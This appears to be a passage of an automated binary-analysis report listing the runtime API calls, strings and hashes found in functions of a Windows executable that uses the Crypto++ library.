                                          • Instruction ID: a6f3cf21db58b9143eccd012550042b01c5d82dcb8f9bc35f26174108e6f02d1
                                          • Opcode Fuzzy Hash: 86fd37f9fcfa039013af08d9891959c7e11e685d1dc577d948e34d99205b7b61
                                          • Instruction Fuzzy Hash: 3A214172900649AFCB01DF55D941F9EF7FCFB59710F11466AE911A3640E774AA04CB90
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: d793f543176f0b1c99b572d6b591dedc3c20c42d1722a4dd46d95aaa2f7f2bbe
                                          • Instruction ID: 0b80886b8c9edb65e4dfe63caa67b89189a4fc15aa877eb2049b5e2f5ee7190b
                                          • Opcode Fuzzy Hash: d793f543176f0b1c99b572d6b591dedc3c20c42d1722a4dd46d95aaa2f7f2bbe
                                          • Instruction Fuzzy Hash: 1E11E676A01B08DFEB11BBB4DE417AE37B49F09720F408155F5088B292DBB4894187B1
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009B29AB
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009B29FA
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name$w#G!
                                          • API String ID: 3988782225-1299196660
                                          • Opcode ID: dcb78d8b2143258e5247f8186b5167cb433ff3728394ddf8cae02e42157dadd6
                                          • Instruction ID: ddd8c20903566d772f3ab7f4eac11bfa39ae32445625e4abb76716832efe4ce4
                                          • Opcode Fuzzy Hash: dcb78d8b2143258e5247f8186b5167cb433ff3728394ddf8cae02e42157dadd6
                                          • Instruction Fuzzy Hash: 0E119E71905B44AFD320CF69C901B47BBE8FF19710F008A2EE899C7B81D7B5A504CB95
                                          APIs
                                          • CreateEventA.KERNEL32(?,?,?,?,21472377,w#G!w#G!,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000), ref: 009B50D4
                                          • CloseHandle.KERNEL32(00000000,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000,21472377,21472377), ref: 009B50EF
                                          Similarity
                                          • API ID: CloseCreateEventHandle
                                          • String ID: w#G!$w#G!w#G!
                                          • API String ID: 3369476804-2921573523
                                          • Opcode ID: 90542a2a6ad427e30c3cefac86a1e5b311e6923b4e6c2809294e3351220ea5f3
                                          • Instruction ID: 8d97d48b864b38f596a8e5209e2f52cec994f07421ef5dcf3750729ad3cc6e97
                                          • Opcode Fuzzy Hash: 90542a2a6ad427e30c3cefac86a1e5b311e6923b4e6c2809294e3351220ea5f3
                                          • Instruction Fuzzy Hash: B101C876A08604AFDB15DF6CDD01BAAB7ECEB44714F14866EEC15D3740EB31EC008690
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009E021F
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified$w#G!
                                          • API String ID: 2005118841-3848619065
                                          • Opcode ID: 553e2f4e3c3495f63d226b9ac534c5ba5807b2aa79e431acbd00cfc655a33d45
                                          • Instruction ID: deace2feb90985efef0f22122e7aa7b53a6ad741abba1a58c3f9dcf72e1b0379
                                          • Opcode Fuzzy Hash: 553e2f4e3c3495f63d226b9ac534c5ba5807b2aa79e431acbd00cfc655a33d45
                                          • Instruction Fuzzy Hash: 62017171944648EBCB05DF94CD42FDEB7BCFB48714F108966E911A7281DB71AD058B50
                                          APIs
                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,21472377,?,?,?,00A89950,000000FF), ref: 00A402A0
                                          • CloseHandle.KERNEL32(?,?,?,?,00A89950,000000FF), ref: 00A402B5
                                            • Part of subcall function 00A3FF40: GetCurrentProcessId.KERNEL32(00000000,00A3F405,00000000,?,21472377), ref: 00A3FFDC
                                          • SetEvent.KERNEL32(?,21472377,?,?,?,00A89950,000000FF), ref: 00A402C3
                                          Similarity
                                          • API ID: Event$CloseCurrentHandleOpenProcess
                                          • String ID: w#G!
                                          • API String ID: 1808840098-519468572
                                          • Opcode ID: 5e8c7e44edfcaf07342b8e787d641bfcd75e41582101d796e3239351293a6c8d
                                          • Instruction ID: 91cfd03674fb34b1b9c5c8c5cef4cb2f9d75f81df0c0310bbbdbf794f8b7cb2d
                                          • Opcode Fuzzy Hash: 5e8c7e44edfcaf07342b8e787d641bfcd75e41582101d796e3239351293a6c8d
                                          • Instruction Fuzzy Hash: F1118E36A01614AFCB22CF25CC09F96B7B8FB45B30F05436AFE1893690DB70A9058AD0
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 00A843D0
                                          • make_shared.LIBCPMT ref: 00A8441B
                                            • Part of subcall function 00A840B0: __EH_prolog3.LIBCMT ref: 00A840B7
                                          Similarity
                                          • API ID: H_prolog3H_prolog3_catchmake_shared
                                          • String ID: MOC$RCC
                                          • API String ID: 1798871530-2084237596
                                          • Opcode ID: 46da291a125ced50f701cb06473506cd207f2f7d4cd05da71f5f3b89ced3aa2f
                                          • Instruction ID: f83eac512282dcd0f99d0de06c95fbfbe32f435f5bd09a4416efb07fc197fa9f
                                          • Opcode Fuzzy Hash: 46da291a125ced50f701cb06473506cd207f2f7d4cd05da71f5f3b89ced3aa2f
                                          • Instruction Fuzzy Hash: 29F06235605256CFCB11BF68D5426AC3B70BF5A741B454091F8026B225CB385E49CFA3
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A46163
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A46171
                                          Similarity
                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                          • String ID: pScheduler$version
                                          • API String ID: 1687795959-3154422776
                                          • Opcode ID: bf1c642210d4b5c1c58e529c3712339a4dd60306b2fdb85a0ba56533ff5a2815
                                          • Instruction ID: 722b16baaff185f21ed11681d98be4d951a17f8471dbb0693b58edffc954858c
                                          • Opcode Fuzzy Hash: bf1c642210d4b5c1c58e529c3712339a4dd60306b2fdb85a0ba56533ff5a2815
                                          • Instruction Fuzzy Hash: CFE07D38A0020CF6CF00FB58DA0BFDC33A87F44305F0088657A04220D2C7B0A688C742
                                          APIs
                                          • GetLastError.KERNEL32(?,Dflt,00A59233,?,00AC9A68,?,?,?,?,?,?,?), ref: 00A5A308
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A5A316
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 00A5A31F
                                          Similarity
                                          • API ID: ErrorLast$Value___vcrt_
                                          • String ID: Dflt
                                          • API String ID: 483936075-3880269418
                                          • Opcode ID: 61ac216b51f247a5b82e4ffafc217f7bbe7881c3819109d0261f0ebe1183b1c4
                                          • Instruction ID: d848c86686f13374f5c7a21d386b5883e074460b99651e03369cb47ddeb2a36c
                                          • Opcode Fuzzy Hash: 61ac216b51f247a5b82e4ffafc217f7bbe7881c3819109d0261f0ebe1183b1c4
                                          • Instruction Fuzzy Hash: 91D0EC3A7152125B8E109BB5BC098E67AB6F6912763154732E511C2094DB78944B9650
                                          Similarity
                                          • API ID: _strcspn$H_prolog3_ctype
                                          • String ID:
                                          • API String ID: 838279627-0
                                          • Opcode ID: fe3e59a0287462718b20f793acab6a01406029725db608ef1ece60ca69ecddc5
                                          • Instruction ID: 040b37906118ef1caa0829e067be5d433311e5a3e24a4a8cd4898e9d63bddb50
                                          • Opcode Fuzzy Hash: fe3e59a0287462718b20f793acab6a01406029725db608ef1ece60ca69ecddc5
                                          • Instruction Fuzzy Hash: 9CB15775D002699FCF14DFA8D984AEEBBB9FF48320F144029F845AB211D734AE45CBA1
                                          Similarity
                                          • API ID: _strcspn$H_prolog3_ctype
                                          • String ID:
                                          • API String ID: 838279627-0
                                          • Opcode ID: 4570406e7e3c321d30f322e8c914d5782e0b956aed7e2fe92eb5e8410d02fdb9
                                          • Instruction ID: e5553c283f7b361c7c9a09b8e078790c9157ba88881931763ecb5a242646d403
                                          • Opcode Fuzzy Hash: 4570406e7e3c321d30f322e8c914d5782e0b956aed7e2fe92eb5e8410d02fdb9
                                          • Instruction Fuzzy Hash: 6BB16C75D00269DFDF14DFA8D985AEEBBB9FF48320F144029E845AB201D734AE45CBA1
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: 04f9d30c51f2b0244de80eb4617da74159d0f329b2ec7b00a44890934ffcd9f7
                                          • Instruction ID: e3c8e12c4226e26ee7c4f4c0a3fb7ed467f44df59d18c8717421789ca4384a64
                                          • Opcode Fuzzy Hash: 04f9d30c51f2b0244de80eb4617da74159d0f329b2ec7b00a44890934ffcd9f7
                                          • Instruction Fuzzy Hash: D5511672701606AFDB298F94D945B7A73B5FF60312F10422DEC064B281E771EC8ADB92
                                          APIs
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52B97
                                            • Part of subcall function 00A4CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A4CB27
                                          • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00A52BB0
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A52BC6
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A52C07
                                          Similarity
                                          • API ID: Context$Base::Concurrency::details::$EventThrow$AssignBlockedConcurrency::location::_Exception@8InternalSpinTraceUntil
                                          • String ID:
                                          • API String ID: 1204113144-0
                                          • Opcode ID: 712760b761d0e21f1def22bab2b3b6bc7355ec6d06072b2314b676b79eae7eb4
                                          • Instruction ID: 696dae3296c9d8066fcffa8226f78f46b874ea8e09e9a2efcd87bd3658847841
                                          • Opcode Fuzzy Hash: 712760b761d0e21f1def22bab2b3b6bc7355ec6d06072b2314b676b79eae7eb4
                                          • Instruction Fuzzy Hash: CE210835B002149FCB04EF68C986AADB7F5FF88721B514559E901AB381DF30AD09CB91
                                          APIs
                                          • CloseHandle.KERNEL32(?,21472377,?,?,2147239F,214723AF,00A8BF00,000000FF,?,00A400DC,214723AF,?,214723AF,?,00A3FD89), ref: 00A3EA59
                                          • CloseHandle.KERNEL32(?,21472377,?,?,2147239F,214723AF,00A8BF00,000000FF,?,00A400DC,214723AF,?,214723AF,?,00A3FD89), ref: 00A3EA6E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
• Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: w#G!$w#G!w#G!
                                          • API String ID: 2962429428-2921573523
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00A72D39,?,00000000,00000000,00000000,?,00A73066,00000006,FlsSetValue), ref: 00A72DC4
                                          • GetLastError.KERNEL32(?,00A72D39,?,00000000,00000000,00000000,?,00A73066,00000006,FlsSetValue,00A9F560,FlsSetValue,00000000,00000364,?,00A7444C), ref: 00A72DD0
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A72D39,?,00000000,00000000,00000000,?,00A73066,00000006,FlsSetValue,00A9F560,FlsSetValue,00000000), ref: 00A72DDE
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          APIs
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D30E
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D31E
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D32E
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D342
                                          Similarity
                                          • API ID: Compare_exchange_acquire_4std::_
                                          • String ID:
                                          • API String ID: 3973403980-0
                                          APIs
                                          • RegisterWaitForSingleObject.KERNEL32(00A4896E,00A54A42,75EC5D89,00A54B42,000000FF,0000000C), ref: 00A429C4
                                          • GetLastError.KERNEL32(?,00A54B42,75EC5D89,00A54A42,00A4896E,?,?,?,?,00A4896E,?,?,?,?,00000000), ref: 00A429D3
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A429E9
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A429F7
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                          • String ID:
                                          • API String ID: 3803302727-0
                                          APIs
                                          • ___crtCreateEventExW.LIBCPMT ref: 00A426E8
                                          • GetLastError.KERNEL32(?,?,?,?,?,00A41F19), ref: 00A426F6
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A4270C
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4271A
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                          • String ID:
                                          • API String ID: 200240550-0
                                          APIs
                                          • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A41F19), ref: 00A428F3
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A41F19), ref: 00A42902
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42918
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42926
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                          • String ID:
                                          • API String ID: 3016159387-0
                                          APIs
                                          • SetThreadPriority.KERNEL32(?,?), ref: 00A42A4D
                                          • GetLastError.KERNEL32 ref: 00A42A59
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42A6F
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42A7D
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                          • String ID:
                                          • API String ID: 4286982218-0
                                          APIs
                                          • TlsSetValue.KERNEL32(?,00000000,00A47D16,00000000,?,?,00A41F19,?,?,?,00000000,?,00000000), ref: 00A42B13
                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00A42B1F
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42B35
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42B43
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                          • String ID:
                                          • API String ID: 1964976909-0
                                          APIs
                                          • TlsAlloc.KERNEL32(?,00A41F19), ref: 00A42AB4
                                          • GetLastError.KERNEL32 ref: 00A42AC1
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42AD7
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42AE5
                                          Similarity
                                          • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                          • String ID:
                                          • API String ID: 3103352999-0
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FE9A9
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: FilterWithBufferedInput$w#G!
                                          • API String ID: 2005118841-4183689890
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F23B7
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: RoundUpToMultipleOf: integer overflow$w#G!
                                          • API String ID: 2005118841-1561500468
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!$w#G!
                                          • API String ID: 0-1134387879
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009F4D52
                                          Strings
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: is not a valid key length$w#G!
                                          • API String ID: 2659868963-2964869908
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B2726
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009B27C0
                                          Strings
                                          Similarity
                                          • API ID: ___std_exception_copy___std_exception_destroy
                                          • String ID: w#G!
                                          • API String ID: 2970364248-519468572
                                          APIs
                                            • Part of subcall function 009EFC20: ___std_exception_copy.LIBVCRUNTIME ref: 009EFC6B
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009EEEAE
                                            • Part of subcall function 00A4079A: EnterCriticalSection.KERNEL32(00AD87E8,00AD9528,?,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407A5
                                            • Part of subcall function 00A4079A: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407E2
                                          Strings
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave___std_exception_copy___std_exception_destroy
                                          • String ID: bad allocation$w#G!
                                          • API String ID: 1690483291-2551379104
                                          APIs
                                            • Part of subcall function 009EFCD0: ___std_exception_copy.LIBVCRUNTIME ref: 009EFD1B
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009EF19E
                                            • Part of subcall function 00A4079A: EnterCriticalSection.KERNEL32(00AD87E8,00AD9528,?,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407A5
                                            • Part of subcall function 00A4079A: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407E2
                                          Strings
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave___std_exception_copy___std_exception_destroy
                                          • String ID: bad exception$w#G!
                                          • API String ID: 1690483291-1382357841
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00A6C91D
                                          Strings
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: ($w#G!
                                          • API String ID: 0-1372456508
                                          APIs
                                            • Part of subcall function 00A7BEDE: GetOEMCP.KERNEL32(00000000,?,?,00A7C167,?), ref: 00A7BF09
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A7C1AC,?,00000000), ref: 00A7C37F
                                          • GetCPInfo.KERNEL32(00000000,00A7C1AC,?,?,?,00A7C1AC,?,00000000), ref: 00A7C392
                                          Strings
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID: w#G!
                                          • API String ID: 546120528-519468572
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A0307E
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: Integer: input length is too small$w#G!
                                          • API String ID: 2005118841-3991733091
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009F4F02
                                          Strings
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: : this object doesn't support multiple channels$w#G!
                                          • API String ID: 2659868963-3326484628
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A107BF
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          Strings
                                          Similarity
                                          • API ID: Name___std_type_info_name___un
                                          • String ID: ThisObject:$w#G!
                                          • API String ID: 642245251-721299124
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A1097F
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          Strings
                                          Similarity
                                          • API ID: Name___std_type_info_name___un
                                          • String ID: ThisObject:$w#G!
                                          • API String ID: 642245251-721299124
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7833E
                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00A783BE
                                          Strings
                                          Similarity
                                          • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: w#G!
                                          • API String ID: 1834446548-519468572
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A06388
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: Integer: Min must be no greater than Max$w#G!
                                          • API String ID: 2005118841-393831224
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: H_prolog3_ctype
                                          • String ID: %.0Lf
                                          • API String ID: 2548254987-1402515088
                                          • Opcode ID: 0f36c2bd863a315aa33849daa808e6c4091e87ef79708ab9c77eea30ecef6413
                                          • Instruction ID: 631cc38ac22591065cef8c87a6b0aed29580396962da550c270a54cdee2ac809
                                          • Opcode Fuzzy Hash: 0f36c2bd863a315aa33849daa808e6c4091e87ef79708ab9c77eea30ecef6413
                                          • Instruction Fuzzy Hash: C1418672E00218ABCF05EFD4CD49BEEBBB9EB04310F108548F855AB295DB759A19CF90
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: H_prolog3_ctype
                                          • String ID: %.0Lf
                                          • API String ID: 2548254987-1402515088
                                          • Opcode ID: 0802456202f8eb704d363c0287e1b78fe8a48ac3da5299287850e052709542b4
                                          • Instruction ID: dd7f8c4efc04cc652227c36de618e3f8ce1d6ac8289edd1ae0bdd809d70f0d3a
                                          • Opcode Fuzzy Hash: 0802456202f8eb704d363c0287e1b78fe8a48ac3da5299287850e052709542b4
                                          • Instruction Fuzzy Hash: 28416476E00208ABCF05EFD4C845BDEBBB9BB04311F208548F855AB2A5DB759A198B90
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC41E
                                            • Part of subcall function 009F4760: __CxxThrowException@8.LIBVCRUNTIME ref: 009F47FD
                                            • Part of subcall function 009F4760: __CxxThrowException@8.LIBVCRUNTIME ref: 009F482B
                                            • Part of subcall function 009F4760: ___std_exception_copy.LIBVCRUNTIME ref: 009F4882
                                          Strings
                                          • FilterWithBufferedInput: invalid buffer size, xrefs: 009FC3F8
                                          • w#G!, xrefs: 009FC2C4
                                          Similarity
                                          • API ID: Exception@8Throw$___std_exception_copy
                                          • String ID: FilterWithBufferedInput: invalid buffer size$w#G!
                                          • API String ID: 4178755008-1068819232
                                          • Opcode ID: 5068c8ef6aae0e25fe44e492d60b095df4181ae986b87162fe617f00f1f0fdc2
                                          • Instruction ID: 14b26e867c3306773604106db95eaa741065431f512863847f8f1ff277a6f8de
                                          • Opcode Fuzzy Hash: 5068c8ef6aae0e25fe44e492d60b095df4181ae986b87162fe617f00f1f0fdc2
                                          • Instruction Fuzzy Hash: AF41B9B0900748DFDB20CF68C905B9ABBF4FF48724F108A1DE5569B381C7B5AA09CB90
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A5A99A
                                          Strings
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: 7ae626a1a197784a85a269fe1130440daa72ff83fbc1e85f44e61a63a6d305eb
                                          • Instruction ID: c5386ff86841915adbbf71e59c5229876087a841f4c0be3334f1658cff03052f
                                          • Opcode Fuzzy Hash: 7ae626a1a197784a85a269fe1130440daa72ff83fbc1e85f44e61a63a6d305eb
                                          • Instruction Fuzzy Hash: 24417971A00109AFCF15CF98CE81AEE7BB5BF58341F158259FE04A6221E3359D54DB52
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 00A36A38
                                            • Part of subcall function 00A2B22F: __EH_prolog3.LIBCMT ref: 00A2B236
                                            • Part of subcall function 00A2B22F: std::_Lockit::_Lockit.LIBCPMT ref: 00A2B240
                                            • Part of subcall function 00A2B22F: std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B2B1
                                          Strings
                                          Similarity
                                          • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                          • String ID: %.0Lf$0123456789-
                                          • API String ID: 2728201062-3094241602
                                          • Opcode ID: a8fdcf59d2e7af03106fb2130e24e9407fffa1e5fc08fac1149530f094c0ae5f
                                          • Instruction ID: 635020109401e21b1e2dd7a1c4a5ba6f59996455f474e19573f9f216d81f3090
                                          • Opcode Fuzzy Hash: a8fdcf59d2e7af03106fb2130e24e9407fffa1e5fc08fac1149530f094c0ae5f
                                          • Instruction Fuzzy Hash: 34415E32A00219EFCF05DF98C984AEEBBB2FF49314F548059F901BB255DB709A56CB91
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 00A36CD8
                                            • Part of subcall function 009EC470: std::_Lockit::_Lockit.LIBCPMT ref: 009EC4BC
                                            • Part of subcall function 009EC470: std::_Lockit::_Lockit.LIBCPMT ref: 009EC4DE
                                            • Part of subcall function 009EC470: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC4FE
                                            • Part of subcall function 009EC470: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC5FC
                                          Strings
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                          • String ID: 0123456789-$0123456789-
                                          • API String ID: 2088892359-2494171821
                                          • Opcode ID: 3f6d9ba6e19bdc7fd6b051a5f0299d9f7321941d18dd54a953fdca241d41da61
                                          • Instruction ID: d8a5d4ac1b1d0d6d3298e4a3e60122c9348d1abb8c2781d13eeb21edb3e662b6
                                          • Opcode Fuzzy Hash: 3f6d9ba6e19bdc7fd6b051a5f0299d9f7321941d18dd54a953fdca241d41da61
                                          • Instruction Fuzzy Hash: 2A41AE32A00619EFCF05DF94C980AEE7BB2FF45314F144059F801AB265DB30AE56CBA1
                                          APIs
                                          • WaitForMultipleObjectsEx.KERNEL32(00000002,00000000,00000001,000000FF,00000000,21472377,?,?,?,?,?,?,?,?,00000000,00A89978), ref: 009E09E0
                                            • Part of subcall function 009B4CA0: ___std_exception_copy.LIBVCRUNTIME ref: 009B4CDE
                                            • Part of subcall function 009E9440: __CxxThrowException@8.LIBVCRUNTIME ref: 009E9461
                                          Strings
                                          Similarity
                                          • API ID: Exception@8MultipleObjectsThrowWait___std_exception_copy
                                          • String ID: w#G!$w#G!
                                          • API String ID: 2380241787-1134387879
                                          • Opcode ID: cc224d7266827d568eba9212581fd43c6c03295c3d0e8af1d9b1f93e0b20b364
                                          • Instruction ID: 26a043e823914d0730badd78a743343931f7cf2327a1a3c34a2c18a4b3441e6c
                                          • Opcode Fuzzy Hash: cc224d7266827d568eba9212581fd43c6c03295c3d0e8af1d9b1f93e0b20b364
                                          • Instruction Fuzzy Hash: 5C31E475A002059FE715DF5ADC42BAAB7B9FF84710F24413EE906A7381DBB46D41CB90
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FAB31
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 009FAB08
                                          • w#G!, xrefs: 009FAAF4
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: PK_MessageAccumulator: TruncatedFinal() should not be called$w#G!
                                          • API String ID: 3976011213-2654151947
                                          • Opcode ID: cee6e0e6760043665e71d9c861cafb7dd8e4f53d1c5bc739eeca996b5f8df259
                                          • Instruction ID: a39461cadc6be11db9b1ffcb8712fed6dea5f49e5e316bae77da1cd20582210c
                                          • Opcode Fuzzy Hash: cee6e0e6760043665e71d9c861cafb7dd8e4f53d1c5bc739eeca996b5f8df259
                                          • Instruction Fuzzy Hash: 4B315E756002049FCB04DF65C885EAEBBE9FF98350F150569F901D72A1DB31DD15CB91
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: Wcrtomb
                                          • String ID: w#G!
                                          • API String ID: 2723506260-519468572
                                          • Opcode ID: 5baff46c273c21a6d5a57dc10946ca2bc9cb8595471337a8ff598be223644611
                                          • Instruction ID: 25d01c53d7a2463e7a30a3474e9d1e716710d6f559d5dcdd6a1df025d85b6576
                                          • Opcode Fuzzy Hash: 5baff46c273c21a6d5a57dc10946ca2bc9cb8595471337a8ff598be223644611
                                          • Instruction Fuzzy Hash: 53312CB5A0020ADFCB04DF99D9919BEB7F5FF98310B20446AE95697341E734ED20CBA0
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __dosmaperr_free
                                          • String ID: SystemRoot
                                          • API String ID: 3116789124-2034820756
                                          • Opcode ID: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                          • Instruction ID: 8e42893ed5e1cb345209b44e6c333d86354b94d21b2f569e12a18a62527848e3
                                          • Opcode Fuzzy Hash: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                          • Instruction Fuzzy Hash: 3F213A36A042159FEB29AF78DC51BB977B5EFC6720F298199F8458B341C6329D01C790
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009D0E84
